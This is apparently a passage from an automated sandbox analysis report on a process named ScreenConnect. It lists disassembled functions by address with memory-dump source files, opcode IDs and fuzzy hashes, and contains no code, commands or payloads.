                                                                                                              • Instruction Fuzzy Hash: EC118171A045199F8B04DF6DCC408AAFBF9FF492247148766E439D72A0E730A901CB60
                                                                                                              Function 03704710 Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ab5f2de9ca98ca497cf3d8c437c479e443d0be73005c3152cb918ee7ec0feb77
                                                                                                              • Instruction ID: b09fad8bdb3482a0f023a85ce21646bb5943b3f864384ec7529a03ef7ddb6ae8
                                                                                                              • Opcode Fuzzy Hash: ab5f2de9ca98ca497cf3d8c437c479e443d0be73005c3152cb918ee7ec0feb77
                                                                                                              • Instruction Fuzzy Hash: 0111C2357013059FEB14EB7A8894A6EB7EAEFC665070485BED509C7351EB30EC048791
                                                                                                              Function 048D39D8 Relevance: .1, Instructions: 62COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9e64cb3134f9ddd0b32fc36a095456248a9692b107e7b6f69e1c72c451fdebf
                                                                                                              • Instruction ID: def94ab0381bb24cce85e4c4461dc7fb6e225a0fac4ce13a1e54899454cfb5b3
                                                                                                              • Opcode Fuzzy Hash: f9e64cb3134f9ddd0b32fc36a095456248a9692b107e7b6f69e1c72c451fdebf
                                                                                                              • Instruction Fuzzy Hash: 17114734B002199FDB04DF68C894AADB7F2FF88304F158559D805EB361DB31AC42DB91
                                                                                                              Function 03701738 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 16f897c940b3b3fbe7f778e900d9df6918234e68d9c08adb041d2e2977a466e1
                                                                                                              • Instruction ID: 824dd2eb37a3f4a14d747d2a54343811f2523ff70d5caead3b1882a6abc01bde
                                                                                                              • Opcode Fuzzy Hash: 16f897c940b3b3fbe7f778e900d9df6918234e68d9c08adb041d2e2977a466e1
                                                                                                              • Instruction Fuzzy Hash: 4C2134B680024ADFDF10CF9AC844ADEFBF5FB88310F15852AE918A7240D339A555CFA1
                                                                                                              Function 03701930 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1432db39eccffd943892c697494c3c55441beb7b8e3fb718caff8343b24dabcf
                                                                                                              • Instruction ID: 4ef73aa14d126919e5f301db6b79a1dac60c5a0f9f3dd5bd5eae61738026f746
                                                                                                              • Opcode Fuzzy Hash: 1432db39eccffd943892c697494c3c55441beb7b8e3fb718caff8343b24dabcf
                                                                                                              • Instruction Fuzzy Hash: E611613A3011108FC704DB6DF8A49AAB7FAFBC9225318847AE909C7361CE729C138754
                                                                                                              Function 03700040 Relevance: .1, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 34e954194d12709983030655de9438f99d8ef2b6a53cc2e41d7ea0d7c8a38485
                                                                                                              • Instruction ID: bbda38918de069035ac78342a3282c655579b357fb5efae69027d8e0d231a74f
                                                                                                              • Opcode Fuzzy Hash: 34e954194d12709983030655de9438f99d8ef2b6a53cc2e41d7ea0d7c8a38485
                                                                                                              • Instruction Fuzzy Hash: 1211843170020ADFDB00DFA8D8459AEBBF5EF85710B408529E119AB315DB30AD058B90
                                                                                                              Function 03700A22 Relevance: .1, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c64375e9490c1b6f5bdf9208cc5c6364b23b8e863e6f8e5f28933b2714bed046
                                                                                                              • Instruction ID: ddb684948732360bc1291e071581590094a1ecd10774dbcab7352445313eceba
                                                                                                              • Opcode Fuzzy Hash: c64375e9490c1b6f5bdf9208cc5c6364b23b8e863e6f8e5f28933b2714bed046
                                                                                                              • Instruction Fuzzy Hash: F5118F75609240DFC316CF29D9A4F69BBF5AF86220718C0DEE9498B3A2DB31E805DB50
                                                                                                              Function 037070E8 Relevance: .1, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 46b81950db51d5b62165ad1cfb39317d012d7bdb9cf9d4bc0d1fb337753090f7
                                                                                                              • Instruction ID: e7504da880d41d2c81e9d27e1f6e94c0aa7ec0fca7847b645b40989cf106cb7f
                                                                                                              • Opcode Fuzzy Hash: 46b81950db51d5b62165ad1cfb39317d012d7bdb9cf9d4bc0d1fb337753090f7
                                                                                                              • Instruction Fuzzy Hash: 75115971A00245CFCB28DF68C945AAEBBF1EF88320F148699D515EB3E1D771E8418B80
                                                                                                              Function 0074D66B Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4009579757.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_74d000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
                                                                                                              • Instruction ID: 297f656726b6e7e5928044c1b77ebe353e20fce142e2cce754df5292e36b5be0
                                                                                                              • Opcode Fuzzy Hash: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
                                                                                                              • Instruction Fuzzy Hash: 0811D376504284CFCF16CF10D9C4B16BF72FB98324F24C6A9D8490B256C33AD85ACBA1
                                                                                                              Function 03703E70 Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 60fe486147c7dd1ff7d226369014d981dc4e46639374da2bdc6fc481cd1f0405
                                                                                                              • Instruction ID: b3c03d63baf9d5ffc90b56cbc029a45e7206b84387fe3cd778f60d12e6636b85
                                                                                                              • Opcode Fuzzy Hash: 60fe486147c7dd1ff7d226369014d981dc4e46639374da2bdc6fc481cd1f0405
                                                                                                              • Instruction Fuzzy Hash: D0214278E0010ADFDB04EFA4D865A6EBBF2FF84301B108969D51AA7355DB316A12CF91
                                                                                                              Function 048D39E8 Relevance: .1, Instructions: 55COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ded821480d56207aba397aea116ad372c10069e36a2bc7a80c3242d6a623f800
                                                                                                              • Instruction ID: 380ae98350f88c1ddb2d69bce2e3e2093bf808ffaee1778a6886ebeddde041a5
                                                                                                              • Opcode Fuzzy Hash: ded821480d56207aba397aea116ad372c10069e36a2bc7a80c3242d6a623f800
                                                                                                              • Instruction Fuzzy Hash: 7D112834B002199FDB04DBA8C864AAEB7F2EF8C304F148569D909EB361DB35EC418B91
                                                                                                              Function 048D37B0 Relevance: .1, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d7ca3604886576bcaf603f3d2e0e67572b6463636b9fdfc123abbc168e9c25fa
                                                                                                              • Instruction ID: 03d3d0923520d8eb28de49bdddaece945deeb638a982da603c7003bdf7b51138
                                                                                                              • Opcode Fuzzy Hash: d7ca3604886576bcaf603f3d2e0e67572b6463636b9fdfc123abbc168e9c25fa
                                                                                                              • Instruction Fuzzy Hash: 6911F274A01608CFDB14CFA8D484A9EBBF2EF8C314F108569E805EB320CB30A945CF91
                                                                                                              Function 048DF408 Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 54dbdecbe9c7033b59df9f5f3f91bae9aaaa0699aeb897a059a64a2c69d9f171
                                                                                                              • Instruction ID: 0a2bf6013fb9575a0fbdbc23404d9e873c979811f4a056b5c5ab9fc91a13b47c
                                                                                                              • Opcode Fuzzy Hash: 54dbdecbe9c7033b59df9f5f3f91bae9aaaa0699aeb897a059a64a2c69d9f171
                                                                                                              • Instruction Fuzzy Hash: 0311F3B1C002498FDB10DF9AD844BDEFBF4EB48320F15852AD959B7240D778A545CFA5
                                                                                                              Function 03704670 Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 29fbd930091d62523222a48c615ed205cd8fa8ce4bf37e258ea737c0ee64bc20
                                                                                                              • Instruction ID: e90a8823d82a6e5dbe039763fc5a70b679b7b780b5045a62d563b63336cbf82e
                                                                                                              • Opcode Fuzzy Hash: 29fbd930091d62523222a48c615ed205cd8fa8ce4bf37e258ea737c0ee64bc20
                                                                                                              • Instruction Fuzzy Hash: 3F11296650E3D18FD307C72888B85987FF5AE6326830E81DBC4C4CF2A7E655884ADB53
                                                                                                              Function 03706EE8 Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1aae8b656dfc36c8236f44a445bdc56f1b0baa92d55a9497f9f790aa2b6a766a
                                                                                                              • Instruction ID: 77d7fea887d225ae8c11ed088caa19a9df5fc619e3476319406443d572a183c1
                                                                                                              • Opcode Fuzzy Hash: 1aae8b656dfc36c8236f44a445bdc56f1b0baa92d55a9497f9f790aa2b6a766a
                                                                                                              • Instruction Fuzzy Hash: 47019A35304615CFD720DB69C4A4A2AB7EAFF8C66436840A8F95A8B351CF60FC12CB80
                                                                                                              Function 037018A0 Relevance: .1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 61721c31d1dbdc7ac8c8b46ddf847f2aa99db939b7359be23d0492164c2630f3
                                                                                                              • Instruction ID: 133ac95b53ec6da1ef883a7675486426df8ea4b07a1781c6c278dcf1f1189b2a
                                                                                                              • Opcode Fuzzy Hash: 61721c31d1dbdc7ac8c8b46ddf847f2aa99db939b7359be23d0492164c2630f3
                                                                                                              • Instruction Fuzzy Hash: 6401F5313493818FC312CB29E9A69467FF5DE8221030D41EBD499CB363CE24A9099750
                                                                                                              Function 048D7208 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd4606b26a85661b5c2a4b7b6425414a6dfa8eec780f3266aa9a27cd862609d5
                                                                                                              • Instruction ID: e1e34838477b157f5dd92d1e42c34fdaed80aa47a27645860edf76469f2a20cf
                                                                                                              • Opcode Fuzzy Hash: dd4606b26a85661b5c2a4b7b6425414a6dfa8eec780f3266aa9a27cd862609d5
                                                                                                              • Instruction Fuzzy Hash: 5601B170A052459FD704DF69CC4883BBBFAFF89200B15896EE846D7211EA30ED01CBA1
                                                                                                              Function 03706B98 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3781caf545212bbc786f478505a4d05895a35b45cbf59e9bfa3f6505d63fdb42
                                                                                                              • Instruction ID: 11411e86d128503603008e7f6cd53f5d8be105f3adacdadd641f0ee8263a1b4e
                                                                                                              • Opcode Fuzzy Hash: 3781caf545212bbc786f478505a4d05895a35b45cbf59e9bfa3f6505d63fdb42
                                                                                                              • Instruction Fuzzy Hash: 8C01B131300209A7E715E669A455A6EB6E7EBC5220754C938E21E8B355DF34EC098792
                                                                                                              Function 048D7218 Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b570cdc119c05ee3fe556b3cca5deddf425ea06268e5dfe413d6adc9f5d40863
                                                                                                              • Instruction ID: 38dd4f4e82c69fe8a2950fe5a81f30ef1bee514fad89470eb499d2735c1d07bb
                                                                                                              • Opcode Fuzzy Hash: b570cdc119c05ee3fe556b3cca5deddf425ea06268e5dfe413d6adc9f5d40863
                                                                                                              • Instruction Fuzzy Hash: 53018B71B101059FAB04DF6ADC4487BB3FAFBC8210710862AA80AE3200EB30ED018AA0
                                                                                                              Function 03706730 Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 220a8e1430715644d12ee023bfe9a4981e7d31257646417c18a9ca8cb6dda08d
                                                                                                              • Instruction ID: 82b0886d6b1ddd74dc337c02895624da8889ae72b3718ef665fef8d6c1bd8bfc
                                                                                                              • Opcode Fuzzy Hash: 220a8e1430715644d12ee023bfe9a4981e7d31257646417c18a9ca8cb6dda08d
                                                                                                              • Instruction Fuzzy Hash: FA0188B6B0525A9FDF10DAB8D850AEEBBF5EF85211F04817BD904E7241E7309A14CBA0
                                                                                                              Function 048DBFC9 Relevance: .0, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1c0ad655c923014a36f65d911e6283352e6538b1c545a5f73e6a21898b27b58
                                                                                                              • Instruction ID: 30733418253c1b4e81afdee9b2e47e26eb16870220def870f9e2bced7e1d1155
                                                                                                              • Opcode Fuzzy Hash: c1c0ad655c923014a36f65d911e6283352e6538b1c545a5f73e6a21898b27b58
                                                                                                              • Instruction Fuzzy Hash: 25112A35A11208DBDB14DF94C858BDEBBF1AF8C311F144929D401F32A0DBB56C85CBA5
                                                                                                              Function 048DF4B1 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 93dda383f6a18cba3974f6381eccdcd4b32e7a5679b916502806ba2d4d3e77a5
                                                                                                              • Instruction ID: aa0e4c262fab8fb3b181cd17dacaf9c65f278d231ae2e5ed5f149a3632bc07a9
                                                                                                              • Opcode Fuzzy Hash: 93dda383f6a18cba3974f6381eccdcd4b32e7a5679b916502806ba2d4d3e77a5
                                                                                                              • Instruction Fuzzy Hash: 09018B723052409BF315DB6AE8944AEBB52EFC53553148B3ED309DB251DF21AD05C790
                                                                                                              Function 048D2059 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5c9f4a7b1cd3ad3bc05706fa013362e36da4b34557ece01ebfad46880e29e796
                                                                                                              • Instruction ID: a0ca3e809df007864f7c8d4b8cffa8fdc12d1af861d00a1b31c5fbd63b4a7cc2
                                                                                                              • Opcode Fuzzy Hash: 5c9f4a7b1cd3ad3bc05706fa013362e36da4b34557ece01ebfad46880e29e796
                                                                                                              • Instruction Fuzzy Hash: E3012D75E0021A8FCB40EFA8D85459EBBF4FF48210B10866AD519E3301EB34A919CB90
                                                                                                              Function 0074D01D Relevance: .0, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4009579757.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_74d000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 07621bf7fd9207fb33210f86cdcb6a4e5bdc293a7a0ce0c5f7d95543711b7abe
                                                                                                              • Instruction ID: ad1aa3bf61807cb0b5a920982169d691db65a8f00c5ba06b249d231327d12b1b
                                                                                                              • Opcode Fuzzy Hash: 07621bf7fd9207fb33210f86cdcb6a4e5bdc293a7a0ce0c5f7d95543711b7abe
                                                                                                              • Instruction Fuzzy Hash: 9B01A271504344AAE7308B26DD84B66BF98EF81324F18851AED895B292C37D9C46CAB1
                                                                                                              Function 037067AB Relevance: .0, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d4461b3dc8f5ffbd26a2fea8403d4bc5ab11a610c79d19d6148c10570b3cedf8
                                                                                                              • Instruction ID: d24161d915545505e68f7cca0928daa857fa5babe3482d15a87c906703ffbdf6
                                                                                                              • Opcode Fuzzy Hash: d4461b3dc8f5ffbd26a2fea8403d4bc5ab11a610c79d19d6148c10570b3cedf8
                                                                                                              • Instruction Fuzzy Hash: CF019E30709A408FC756DB28C890A99BBF1EF8621471981C9D449CF253CA21EC47C791
                                                                                                              Function 048DAE88 Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c4220c21742029a5b8e5949f5569a3414b61b5d8ecd62162f88349a64556fd80
                                                                                                              • Instruction ID: b2c943316668af2ba98b756e1fb1ad6f1b246278f3b02f98a654f6c66171e869
                                                                                                              • Opcode Fuzzy Hash: c4220c21742029a5b8e5949f5569a3414b61b5d8ecd62162f88349a64556fd80
                                                                                                              • Instruction Fuzzy Hash: 5B01F936F152458FCB149FB688956BEFBB1EF88304B0889BED155C7211E6384514C790
                                                                                                              Function 048D2068 Relevance: .0, Instructions: 42COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e5dc3007c72daa2fa8d882d8f3e6a9ccd5802850352c1f90c5e5398139fdd916
                                                                                                              • Instruction ID: 4e04f64d3e30476996a15ece748e343c2c034e87f423aa89ded7a4f011a91dd4
                                                                                                              • Opcode Fuzzy Hash: e5dc3007c72daa2fa8d882d8f3e6a9ccd5802850352c1f90c5e5398139fdd916
                                                                                                              • Instruction Fuzzy Hash: 5C012C75E0021A8FCB44DFA9D8545DEBBF4FF88210B10866AD519F3300EB35AA55CBD0
                                                                                                              Function 03707920 Relevance: .0, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f17bb936e6b3270d39cb1033ca99fdf8b01373d51ffdba8e846cfcb98af24864
                                                                                                              • Instruction ID: e7ebfe188beac2cf885b1333d88cdb4f527eb31bfb2cc86360751113a909b7a2
                                                                                                              • Opcode Fuzzy Hash: f17bb936e6b3270d39cb1033ca99fdf8b01373d51ffdba8e846cfcb98af24864
                                                                                                              • Instruction Fuzzy Hash: 96018FB19193C49FC706DB78CC59998BFF0EE0711070944DBD4C8DB2A2E2346905CB52
                                                                                                              Function 048DACDF Relevance: .0, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e36414a9f4e516c8ca6247cccaedf63726bc669d74e15c5d28632120efed7bed
                                                                                                              • Instruction ID: f4a043118d40610828ace817dd9a58d7b5aec39db0a87eebe822da63ee4b715a
                                                                                                              • Opcode Fuzzy Hash: e36414a9f4e516c8ca6247cccaedf63726bc669d74e15c5d28632120efed7bed
                                                                                                              • Instruction Fuzzy Hash: BDF0AF71E051099E8B24DE7EC8409AAB7F9EF88221B104B69E429D3290E370A801CB50
                                                                                                              Function 048DAE98 Relevance: .0, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cedc54d029d75f514dfb3ef5964b0f5357d2b10c701b4e188900b8aadaa63267
                                                                                                              • Instruction ID: 39f07f67bf5fa59fcb0d30eb3451351491e90776e659a0a8249bb8e0263a6044
                                                                                                              • Opcode Fuzzy Hash: cedc54d029d75f514dfb3ef5964b0f5357d2b10c701b4e188900b8aadaa63267
                                                                                                              • Instruction Fuzzy Hash: BAF0C835F002098F8F049FEACC856BEFBB5EB84324B048739D634C3281D77855008790
                                                                                                              Function 048DC9F9 Relevance: .0, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
